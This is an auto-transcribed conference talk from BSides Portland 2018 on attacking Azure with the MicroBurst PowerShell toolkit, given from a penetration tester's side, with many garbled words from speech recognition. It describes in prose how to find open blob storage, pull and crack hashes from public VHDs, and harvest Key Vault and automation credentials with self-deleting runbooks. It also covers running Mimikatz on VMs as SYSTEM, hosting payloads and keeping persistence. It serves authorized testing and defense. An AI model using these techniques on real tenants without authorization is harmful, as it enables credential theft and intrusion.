Karl Fosaaen - Attacking Azure Environments with PowerShell - BSides Portland 2018

thanks everybody can everybody hear me this distance I don't know how close I need to get to the mic here alright so I think that intro kind of covered most of it here but a little bit about me I'm Karl Fossen practice director at net spy I do pen testing in the past I've done lots of password cracking social engineering blogging a bit of a cloud enthusiast and since we are in Oregon I'm a homebrewer like to brew beer I was actually here for homebrew con like six months ago know if anybody else was but another fun conference that happens to be here thank you for being here on a Saturday afternoon with the competition of the

other conferences going on here I know Pokemon and anime might be a little bit more exciting but we'll try and make this interesting so my info is up here net spies github you can find a lot of the stuff I've written up at blog dotnet spy calm you can find me at twitter at kaif awesome and I'm the old guy yelling at the cloud so this is our outline we're gonna talk about all this stuff so I'm not gonna stay on this slide but we're gonna start with talking about dumping a juror data first so why would we want to dump data from a juror so we have a number of clients who are moving over to Azure

because of a lot of reasons but primarily Wow everything is pumping ahead here so primarily a lot of our clients are starting to move over to Azure environments due to the fact that Azure Active Directory is easy to integrate with existing Active Directory environments so things like role based access control or Billy now all of these things can be tied to Active Directory users and groups that's really easy to migrate to cloud infrastructure that's already tied to your Active Directory infrastructure as attackers this is great for us because things like season in year password combinations we can go ahead and guess a user's password for a domain during I don't know why this keeps jumping ahead my timings are all

messed up on here anyways [Music] what I'm saying is as an attacker from an external perspective we can go ahead and guess a password and get access to Active Directory through the Microsoft portal or through Azure so frequently when we get those credentials during an external pen test we like to go ahead and dump information from the issuer configuration to further our attacks so typically normal domain users have access to the azure portal most times that we run into Active Directory creds on an external pen test those users have rights to login it's pretty rare that it's actually locked down to a point that regular users do not have access to the user report Allah so we want to get

access to all that information additionally doing as your infrastructure audits we do have clients that bring us in to look at their actual issuer infrastructure and do an audit against you know best practices make sure that everything is actively correctly managed and set up properly all of that so why can we do this well the user management is available over the Internet it's the cloud it's meant to be available publicly frequently this is done without multi-factor authentication typically for a standard Windows domain they're not gonna set up multi-factor authentication for the issuer portal if they're not walking down portal access in the first place so we're finding lots of single factor authentication points with the visual

portal and it's easy to get access this way so why do we want to automate this well talking about all of the things that we want to gather doing this by hand and going through the portal website can be a little bit time-consuming while the copying and pasting we want to automate this with PowerShell which is what we did with the micro burst tools so micro burst is a github repo that we've got the link for right up here I'll have links for all this stuff at the end and I'll have the slides later I don't know why I keep jumping ahead to the next slide I apologize for that anyways the repositories got a handful

of PowerShell scripts that we use to do as your assessment so here's some of the current functions we're going to talk about these during the actual demo here so we're not gonna linger on these but I does have a couple of module dependencies that will prompt for when you import the actual microburst module so you can find code out here but we'll have more links for that later so a quick note on permissions so a juror has three really important permissions level owner contributor and reader so within an insurer environment this is gonna keep doing this because there's something weird with my timings within each of your environment you've got the environment a subscription within that

environment and then that subscription has different services underneath that within that subscription you've got these three different levels of permissions so the owner owns that subscription and they have rights to delegate rights out to other users startup services basically do everything contributors have rights to fire up virtual machines use different services but they're not allowed to assign specific rights to other users that's what the owner accounts are for the reader roles have rights to read configurations read information but in general not necessarily fire up virtual machines or anything like that there are additional roles that you can create to allow a regular reader users to create virtual machines or deploy code or anything like that

those aren't hugely important here will you actually dump out the list of all of the roles with one of the tools within microburst but they're worth looking into because sometimes there's some interesting kind of inheritance issues where you may end up getting owner type access to something when you didn't intend to have that with some of these custom roles but not hugely important here but worth noting so there's a number of different ways to dump data from a juror there's the juror portal rest api's powershell commandlets and it might jump ahead yeah there we go I don't know why it keeps doing this but anyways we'll talk about the azure portal first kind of mentioned this first we log in

through the web interface that's portal as your comm and if it's tied to your Active Directory or back to a federated a Active Directory domain it's pretty easy to access with standard Windows domain credentials but pros it's a nice graphical interface we can see kind of the sidebar here over on the right-hand side of the screen it's nice to look at but it's really hard to dump configuration information that way so in terms of scaling it's not easy to scale pulling information from there the rest api's that are available or nice structured JSON data it's easy to make requests easy to get data back but setting up authentication for it getting the actual like tokens to access

it and some of the JSON data formatting is not ideal in terms of doing a lot of this at scale so with the powershell commandlets we've got integrated off with the Active Directory authentication libraries so you just put in username and passwords get a token really easy to operate with that all of the data is typically returned as pipeline able objects so if those people in the room that are not familiar with PowerShell you have objects that you can basically export from one function to another and basically pipeline all of that data from one function to another so let's say we want to get a list of all of the network interfaces for all of the virtual

machines well we could just ask a juror for a list of all of the virtual machines pipe that virtual machine list into get interface and basically pull out a list for each virtual machine each of their interfaces so we can pipeline all of this and streamline everything which is really good for scalability if you've got you know 400 virtual machines that you need to pull you know IP addresses for it's really easy to do that it's nice for data output as well those same objects are easy to export to CSV files or text files the only real con is PowerShell is a little bit limited in terms of threading options it's kind of hard to spin up a

bunch of different threads and it's it's hard to kind of multitask with PowerShell it's it's not ideal but the objects definitely make up for that so hopefully this doesn't jump ahead here all right we'll just plan for that on every slide no it's something with the template I was trying to add some of these transitions earlier today so that things would pop up one at a time and I must have enabled something that automatically skips so anyways there are three different primary powershell commandlets that you're gonna be using the first two the issuer service management and Azure RM are kind of the primary ones that microbursts uses those are more of the older style these your

service management it's kind of the original powershell commandlets that you use to manage at your infrastructure as your RM is the newer option for resource management most of the functions that we're using in microbursts are around as your RM modules AZ is the latest option that's actually going to replace the azure RM modules they just announced that about a week ago luckily for me pretty much everything is going to be backwards compatible with Azure RM command le'ts so I'm not gonna have to rewrite everything in about 6 months so that's nice the last one that we included on here is ms online so this is for Microsoft online services or office 365 basically if you're in a situation where

you've got domain creds and you want to dump information about a domain and you don't have access to any of these or commandlets or access to the issue or portal chances are you're gonna have access to office 365 where you can then still pull information about the domain domain users groups lots of other stuff it's pretty handy but I'm including that on here because some of the Microverse stuff makes use of the MS online Commandments so there is some existing tooling and research out here already there's tool called as you car I actually just talked with the author about that talked with the author of that tool a couple of weeks ago about their tool it doesn't quite meet the use

cases for how I typically test Azure environments but it is a good tool as great reporting there's edge write Explorer I haven't really used this a whole lot couple of the commandlets in there are old commandlets that are not compatible with current version of azure RM so ever really use that but if the microbrews tools do not work for you I'd say go check out those they may be more you know focused on the things that you're specifically looking to test so I would say that this book that I have right up here if anybody wants to look after the talk is kind of required reading if you're going to be doing any as your pen

testing so it's pen testing user applications by Matt burrow I can find that on no starch this came out right before Def Con I think and it really clearly outlines a good testing process for testing these your applications and ensure environments it's gonna drive me crazy sorry I can probably fix this in about two seconds

where's it I don't remember it was online so just disabled the one thing that I enabled earlier so we'll see if that works anyways this is a great book if you're going to be pen testing as you're a lot then wow that is really annoying sorry alright so if you're gonna be doing lots of your applications or is your environments I definitely recommend reading this and jumping ahead to the next slide so let's talk about your services here so there are a number of different Azure services that are out there there are way too many to talk about today we have relatively limited time here but this is a rough count of the ones that we're going to talk about

primarily we're gonna be looking at Afeni kated services that we can identify and unauthenticated services we can identify so as an attacker I want things that I can potentially attack unauthenticated enumerate different services without authentication without those Active Directory domain credentials and once we are authenticated I want to be able to list out all of the different important services that are enabled and stuff that we might be able to use for lateral movement pivoting anything like that so this is kind of a rough overview of some of the ones we're gonna talk about but first things first we'll talk about a juror Active Directory or Azure ad and the primary things that we care about

here are users and groups really is your Active Directory is just like regular Active Directory thank you in most environments that we're dealing with people are doing something called a der sink or Active Directory sync up to Azure ad to basically sync up all of their Active Directory users and groups to a juror so that you can you know make use of those existing Active Directory users and groups so within that we want to dump out tons of information to start attacking other users in the environment so additional recon info including things like phone numbers so let's say we compromised that external environment when I start doing phone based social engineering to get way into internal systems likewise with

phishing we can pull out email addresses from Active Directory start phishing attacks that way taking a look at enrolled devices this one's really fun because lots of Azure Active Directory environments are now allowing kind of asset management options within your Active Directory so you can you know track an asset to a specific person so I can look up a specific domain administrator and know what the host name of their system is so once we pivot to the internal network we know exactly where that domain admins computer is going to be already of the host name pretty convenient third-party apps this is the last line down here as well accessing third-party apps for practical examples one of the things that we can

pull out of Azure Active Directory is the list of integrated SSO endpoints so things like AWS or WebEx or any like HR expensing software that you may have that single sign-on so where basically you go out to the website to put in your HR or expense information that's going to be tied back to your Active Directory or ad FS and we can list out all of the integrations there so if you're on a Red Team assessment and need to get access to the HR Payroll data you know exactly where that URL is to access that so that's really handy it's a good way of showing impact or potential impact the one thing I haven't covered on here is

guest users as your Active Directory has a really interesting feature where you can add external domain users to your Active Directory domain so I could go ahead and add my at net spy com email address to another Azure Active Directory domain as a guest user you can also apply these same types of users and groups policies to give myself say owner rights to the subscription and keep persistent access because if they're not looking at the specific guest users well there's potential there's persistence there and somebody could persist access so those are pretty handy so storage accounts we're gonna give this two seconds to let it bump ahead and then jump back but storage accounts are really the way of storing data

within a juror there's a number of different data types that are supported within these storage accounts but you can think of it this way storage accounts start with the name the type of data type and then cor windows net so in this case we've got a storage account name that's by issuer the service is any number of these names here so let's say the blob service this would be nets by a juror that blob dot cored out windows that net blob is kind of the unstructured data you can think of it like s3 buckets for a juror you can basically just put whatever data you want in there and there's containers you can apply policies to the different

folders to give people access actually talk about that access policy and the next screenshot here but this can also be easily misconfigured so when you're setting up permissions for things administrators need to give access to things to people so you know I go for the things that work so container access is anonymous access for everybody read access everything you can list out files and access any of the files there in the container permission container so we frequently find that with containers that are just set up and publicly available so if we step back one step here what we would do is look up a storage account trying DNS brute force for one of these storage accounts look

at the blobs and enumerate folders from there so let's say it's net spy as your blob Corti windows at net after that we would start guessing folder names here we've got a script that we reference on the blog post down here that you can do anonymous blob enumeration so what we do with that is a DNS brute force on that storage account and then try and look for specific containers after that so we find very common names for folders or containers test dev email all sorts of just very common names and you can basically throw you know a directory attack and grab your favorite list of rector ease and throw that in for potential folders for the containers if

any of those have public access enabled or container access enabled we'll then go ahead and just list out all of the publicly available files this is kind of where we're at with the open s3 buckets from what three four years ago where lots of public data was just spilling everywhere we're seeing lots of similar problems with Azure blob security if you're able to find a blob storage container that's fully open chances are all the different files and see everything that's there so it's surprisingly common we find config files VHD files which we'll talk about in the example but there are virtual hard drive files you come out those in hyper-v and we'll show a full walkthrough an example

here it's kind of fun but found some PII password data you can also use these for hosting payloads so that's my blog cored out windows that net the end of that is windows.net and you can access that over HTTPS that SSL certificate is signed by Microsoft so this all looks pretty legitimate if you send somebody out to a Windows net web site to download and run an executable or whatever file you want so we've actually had pretty good luck with fishing engagements where the link is out to blob storage because we can make that publicly available and host payloads out there and if anybody's worried about like oh but if I keep my payload out there you know Microsoft

will capture it I've had copies of like me me cats and other like reverse tools sitting in a storage container for your now so I haven't gotten an email or any notification hey you might have malware up in your blog or up in your blobs so it's worked out pretty well so another service that we're commonly seen used is as your sequel so it's Microsoft sequel up in the cloud sure sequel is really handy for you know just having your database out in the cloud if you're gonna host everything out there however you know when you see cases where people just open up the firewall rules to the actual database and it's just wide open

to the internet it's actually kind of hard to do you have to set your IP address range that's allowed to a pretty wide range to allow it but we've seen it typically in development environments where you've got you know a team that's separated across you know different time zones or different IP spaces or might be working from different coffee shops that kind of thing but we've seen it where it's you know pretty widely open on the firewall rules and you can access that directly with sequel management studio you basically just point it at the azure sequel database and you can go ahead and try and log in we've seen it set up with you know common dev environment problems

of weak sa passwords or just weak credentials in general we've also made use of it as the commanding control platform so you could just go ahead and use Azure sequel database tables and some PowerShell to basically send command and control because again we're going out to a trusted Windows domain and we're just making Microsoft sequel traffic throughs going out over the Internet but if you're a major shop there's a chance that you might actually be using Azure sequel for legitimate uses so my co-workers Scott Sutherland who put together a PowerShell toolkit called powerup sequel for attacking Microsoft sequel databases using PowerShell tools he put together a really great bro great blog post about using sequel as a c2 platform so you can

check that out on the net spy block you can also access this directly from the Microsoft Azure portal there's a couple of different spots where you can pull credentials which we'll talk about later on but if you pull those connection strings and get access to the azure sequel database you actually just use the direct sequel query functionality within the Microsoft portal and just query the database directly from the website so it's also pretty handy oh I mentioned that from a operational security standpoint so if you don't want to open up firewall rules to your IP address to connect with sequel management studio you can just go through the website and then you don't have to open up any firewall rules or

anything like that you can just log in with the creds you have so that's convenient so in terms of passwords there's a number of different places that passwords hide out in as your primary one being key volts so key volts or you know what's the name applies able for keys we find keys certificates passwords all sorts of interesting stuff means stored in key vaults typically access on that is pretty restricted you may have to grant yourself access with any accounts that you have in order to actually pull out data from that but if you do have an account that does have access to the key vaults this can be really convenient for getting you know

password data or certificate data anything that might be handy for pivoting in the environment additionally app service configurations what I was talking about with the database connection strings app services is basically a gorge dynamic application management platform so if you want to deploy your web code out to a web server in Azure you just pointed at the repository for the code and say hey run the web server run this code it's really simple you can figure it with these app service configurations which include things like deployment credentials so where you upload the code to over either HTTP or FTP you can pull those deployment credentials out of what's called the publishing profile within a door and you can go ahead and put your

own web shell up there or run your own code on the web server or do lots of other interesting things so I've written the git as your passwords module within microburst here that will go out to the key vaults pull that information down app service configs do the same thing and also do something with automation accounts so automation accounts are a jurors way of automating different tasks within the issuer environment and you can configure these with specific credentials you can also get access to these credentials relatively easily you create a PowerShell script upload it to a runbook within power within as your and the script is right here we can see that we're just gonna get the username

for the credential the password for the credential and just write them out really simple like this is super simple but we're basically gonna upload that PowerShell script up to a run book in the environment run it get the credentials and delete the automation script after the fact so what we can see here is there's this kind of random I think it's 12 character string right here for the ps1 run book what the get is your password script does is it writes that script that we just saw to a randomly named ps1 file uploads it runs it and deletes it and then all that you see in the logs up and insurer is just this random string here and you maybe

think well maybe Microsoft ran something in the background or this just seems like randomly named garbage it's kind of hard to tell what this is you can't pull down the PowerShell runbook after the fact it's gone it's already run and it's pretty much done at that point so it's not the most OPSEC safe but it can be really handy if you need to get access to those automation creds

all right so let's see if it bounces ahead here all right there we go so just a quick note on microburst it is a PowerShell tool kit it's lots of different PowerShell files to import all of those make use of them you can use the import module command and point it at the PS m1 file and that will load up all of the available commands that we have within microburst so a couple of different command examples we'll go through those in the demo here but I would just recommend with most of them using the verbose flag I like using right verbose because then you can kind of see what's going on otherwise not outputting a

whole lot of the data there but with all of these I think we'll have examples so we'll just go through those so getting into our demo here just making sure we're good on time here all right so this is gonna be a sample escalation from anonymous access basically you don't see anything we're starting with no credentials we're gonna find an anonymously available blob download that file and then kind of pivot from there you're gonna see all of this this is more so if anybody wants to see the slides later go through these the videos aren't gonna be up on SlideShare so this is kind of the rundown of that so autoplay here it probably won't because

I get rid of the timings there we go alright so what we're doing here is using the invoke alright invoke enumerate as your blobs with the base of microburst so it found a storage account called microburst blob quartet windows.net and it's gonna find a test container within there and within that container we've got a public VHD file so VHDs or virtual hard disk this is basically the file format that Microsoft uses for these virtual hard drives that you run virtual machines in the door with these are great they're very portable you can store them in different storage accounts different areas you can create them as kind of gold images this is frequently what we see with these VHD

files is somebody's created a gold image that they want to build all of their Azure drill machines off of then they make it publicly available within a container and then we download it and get access to it if you want to play around with this yourself I would recommend using the small disc all one word small disc images for tape windows because those are only I think those are 32 gigs compared to the standard hundred and twenty gig as your virtual machines it's a lot easier to download 32 gigs from a VHD file than it is 120 so if you're gonna play around with these and do this yourself I would recommend using those I

will also say all of this is done in videos I initially recorded these for derbycon a few weeks ago I've burned this entire environment down to the ground because I figured well if I'm instructing people on how to attack my issue or a sample domain up here probably need to get rid of that after I make all this stuff public so yeah I think that covers that so let's see if we can bypass that jump there so what we're gonna do here is paste the URL that we just saw in the last script there I'm not gonna make you wait and watch 32 gigs download here so we're gonna fast forward in time and there's

our test VHD files so if you right-click and mount within Windows it's really convenient because you can just mount the VHD file what we'll see here is hey it's a standard Windows hard drive open up the windows folder cool so from there we want to get the local admin credentials so we're gonna use Cain and Abel to pull up the system and Sam files if anybody's familiar with this they've probably done this a few times but basically we're gonna grab the local cred store off of that Windows hard drive along with the boot key for it to decrypt it and pull back the local administrator credentials so in this case we're gonna get the ntlm hash for

it'll show up in a second the AZ administrator account we see the NT hash on the right there so there's a couple of different things we can do at this point we'd go ahead and crack it throw it in a hash cat we crack that one it's AZ - admin pass with an exclamation mark okay I'm kind of making it easy on myself because I created that password but anyways if you know that's the situation we're able to crack that we could just go ahead and load up that virtual hard disk in hyper-v and login ourselves so we can see here with nice little who am i down here we're logged in as that user

loaded this up in the hyper-v manager and now we've got full access to that virtual hard drive cool there's lots of other things that you can do with full access to that you could just browse the files the look of things what's nice about this is once you've got full local admin access you can start you know using any applications that are on there so if it's a virtual machine that's used to run a client application or something like that you might be able to do the same things that you'd be able to do up in the cloud down on your local desktop so it's convenient but we kind of want to pivot up into the azure environment

at that point so let's say that we knew a little bit more about the environment we knew the end point that the VM was pulled from if we have the IP address for it or hostname we could potentially find that out on the internet and RDP to it there's a surprising number of your virtual machines with management ports wide open to the Internet it's one of the default options that you can select when you create the virtual machine just say yeah I want RDP open to the world it warns you says hey you're you know setting up RDP open to the world you may not want to do this but it's something that's pretty easy to set out so let's say RDP

is open we'll just go ahead and log in ran me me Katz hey we got access to a domain user for the Fossen domain previously we just have local admin rights now we're getting into the actual domain here so in this case Kay test is domain admin like I said I'm kind of stacking the deck here because this is my demo and it's easier to demo this stuff this is based off of real-world experience we've actually had experience it's like this where this has worked but let's say that RDP is not open everywhere well we can go ahead and grab the Sam security and system files and use the impact secret stump to go ahead

and get the cached financials so we can see here that Kay test account on the Fossen calm domain we've got cached credentials here so this happened when that domain admin logged into the box and that was cached on the Windows system so we pulled that cache credential out and we go ahead and try and crack that so in this case I created this user as a domain admin in Azure Active Directory if you drop off all of the exclamation marks that's the password that Microsoft created for that user by default by default in Azure Active Directory if you let Microsoft manage that domain it will create an eight character password right off the bat it's upper/lower

alphanumeric for the first four and then just numbers for the last four so like Carl one two three four might be an actual password there this is the password they gave me I put a couple exclamation marks onyx I needed to reset it a couple of times but in this case we're able to get the cache credential crack that now we've got domain credentials that we can then go log back into the azure portal or log in through PowerShell and start dumping information so with domain credentials we'll go ahead and connect the ORM account this is just more of the manual process of adding that account locally if you're running any of the microbrews tools it

will prompt you if you're not already authenticated but for proof of concept here we want to show you that process this is the ADL login process here just put in the Kay test at fosston comm and the password we have hey we're logged in to my first demo cool so what we're gonna do here is dump the domain info so we're gonna select our subscription here and start dumping out all of these services and information so this specific script here is going to go through the subscription and dump out all of the users all of the groups all of the services are available basically general configuration information so you can get all of the information about

what your attack surface area is I kind of left some of the password stuff out of here and kept that in to get passwords because wanted to separate the two in case you wanted to use this form or audit focused compared to pen test focus if you're doing more of an audit of your environment you probably don't want to dump all your passwords into the config data that you're also dumping here so I will say that this does run a little bit slow on larger environments if you're looking at 10,000 users in an Active Directory domain this could take quite a while to enumerate all of the users and groups because it'll go through every one of the groups and get

each of the users for each group so there are flags on here to disable that here we're showing the output here so it's gonna output two text files and CSV files for easy parsing and easy data management but I will say if you're dealing with a very large environment I would recommend just disabling the users and groups because that might take quite a while so next thing that we're gonna do here is get these where passwords so we can see here that we're logged in this K test and running the get your passwords function within here with this one I definitely recommend outputting to grid view so you'll see the grid view output at the end of this but grid views

that nice Oh grid view but it's a nice way of visualizing some of the data and it makes it easy for sorting and copying things out so we can see here it's grabbing the list of key vaults these your app services and running our randomly named ps1 file here and here's the out grid view so like I said this is really handy and like I also said I've burned down this entire environment so these passwords are gonna work now so it's okay if you guys see these but what we can see here is you know there's a number of different credentials here the automation account we've got some app service configs a secret up at the top

with super-secret value so there's lots of good information that you can actually pull out of these but like I said key vaults are usually a little bit more locked down so your mileage may vary there all right so last item that we're gonna cover here in the demos is code execution now this is relatively new I'm gonna actually push the code for this within the next week or so here I'm just making some kind of last-minute tweaks to the and for the blogpost it's gonna go with this but this is a way to execute commands on all your virtual machines which might be kind of handy you can also limit it to individual subscriptions or individual resource

groups or just a list of your virtual machines that you want to provide but sure is nice enough to include an invoke as your RM VM run command so it's a bit of a mouthful here but basically you can point the URM VM run command at a specific virtual machine and say hey run this PowerShell script and it will do that it does require contributor rights so somebody that has a little bit more access than a regular reader user however what we've been finding is development people will typically have contributor rights in the issuer environment because they need to spend up virtual machines they need to deploy code they typically have a little bit more access so if you get access to a

developer account chances are you're gonna have contributor rights so the really nice thing about this is all of the commands actually execute as NT Authority system this is really bad like this is the most privileged you can get on a virtual machine and as you're here you're running a system you're running as the operating system it's great for us because if you know we want to run me me cats against all of the virtual machines it's pretty easy for us to do that because we're already system so in the demo we're gonna show we're gonna show actually running me me cats here but so some practical uses here running me me cats against all the virtual

machines together all of these available clear text financials or ntlm hashes pulling those off of those boxes potentially tasking see two agents so if you want to get say an empire meterpreter shell on all of the virtual machines in the insurer virtual machine environment you can go ahead and just do that you basically just task it up and say run this PowerShell command and hit go searching for data it's kind of nice you could search for sensitive files on stuff not so practical uses and you have bot nets or crypto miners or deleting everything off the virtual machines don't do those things those are bad that's my disclaimer for all of us just be careful don't do bad things this also

your success may depend on the VM region or the virtual machine configuration I've had some different regions that don't respond all that well to actually tasking up these commands I've currently the thing that's kind of delaying the blog posts I'm going through each of the different as your virtual machine regions that you can deploy to to try and get kind of timestamps on how long some of these commands run a standard you know us West virtual machine running it from my internet connection at home maybe takes thirty Seconds to a minute to execute the Mimi cat's PowerShell script but what you have to think about is we're actually uploading the entirety of that Mimi cat's powershell script to

that virtual machine running it and then pulling the info back down so it does take a little while to travel over the internet if you're going you know down to Australia or something that's got a bit of a round-trip to make to get back to the US so that could take upwards of a minute or more to actually execute conveniently for our demo I'm able to speed up time and video so it doesn't take that long so do here and what you can see on the screen right now is will run the invoke at your MVM bulk CMD with the Mimi test ps1 script and we'll jump right past our video using the script tag here we can

see the IP addresses for that virtual machine this is kind of handy for just keeping tabs on where that's actually running and we can see the Mimi cats output came back and it'll get to our password here a Hello besides PDX so what's really nice about this is you know if you're using that verbose and you're tasking say empire agents to phone home you can then correlate these specific external IP addresses they're coming back or internal ones to the verbose logs here and kind of figure out which systems actually executed your command-and-control all of that so that's the end of the demo here talking about fixes and kind of conclusions here in general try to limit your as your

access for non admin users there are options to do that and get that set up we do see it occasionally in some environments one thing I didn't know in here is that we've actually had web applications of allowed for Active Directory portal access so we've logged in with an application services application that uses Azure ad for authentication or handling authentication for users and we're actually able to use those credentials to log into the azure portal so something to keep in mind as you're developing applications and as your if you're using Azure Active Directory make sure you're walking down access for that one that's gonna be really hard here is try to get users to stop using fall 2018

is password or season year combinations I don't mean to call out or shame anybody here that is using that but that is the first thing we're gonna guess on a pen test season your combination is one of the most common that we run into outside of like company name one or password one things like that it typically meets complexity requirements we've got eight characters up or lower and a number here that's gonna get us access set up multi-factor authentication for access this is actually really easy to do I did this on my demo environment in like three minutes so it's really simple to set up conclusions wise powerpoints a major pain the cloud is complicated

misconfigurations will happen I learned a lot about configuring cloud services while putting this together I mess stuff up myself sometimes intentionally sometimes not intentionally but there are options for mitigate for mitigating the risks we've got the microburst tool set that you can use to you know check your environment there's other tool sets out there as well I know that some of the automated vulnerability scanners out there now do some configuration reviews I know tenable has got some profiles you can use for that as well so there are some options out there any questions

would it be more expedient to spin up a storage container to see region has whatever your fantastic port like your cloud regions five stores they're good love stores and then make those copies directly in region to something that you own you possess you could potentially do that so the question was when you're doing a pen test and you've got some additional resources to spin up potentially would it make more sense to use a more localized resource to copy over something like VHD files or really large files I haven't tried that personally probably saves a lot of time I've been looking at different options I'm actually working with somebody online who's working on some other stuff

kind of similar to that but in terms of trying to parse those files fully downloading like 120 gig image takes a long time yeah other questions

yep so the question was not only looking for kind of out of policy items but actually enforcing those out of policy items I don't have anything in here at the moment to do any of that we're trying to make this read-only kind of testing there's some some stuff that you know does make some changes but we try to avoid major state changes in general just as kind of a rule of thumb but you know in terms of a tool that could automate that that would be pretty handy for people to use or at least prompt them before they make the changes any other questions that's a good question the question was how noisy is microburst

and how likely would a blue team detect this so the nice thing from an attacker red teamers perspective is we're using native technologies with the issuer commandlets so it's kind of expected behavior to a certain degree there are some indicators for the invoke remote command so I have that in the blog post that's coming up here you can set up specific alerts for specific items particularly around the command execution you know if you're allowing people with contributor rights to run system level code on your virtual machines you should definitely be auditing that and all have specific instructions in the blog post about that

perfect so the note from the crowd here was that there should be very specific logging for the key bolts and I've looked into that yeah I haven't done as much on the the logging and blue team side of things I've mostly just been trying to write tools to attack but eventually we'll switch over to more of those any other questions all right cool well thanks everybody for coming out for a Saturday afternoon talk like I said I know there's competition with the anime and Pokemon here but thanks to my net spite co-workers who did a lot of the QA on this and helped with testing and anybody watching online thank you

you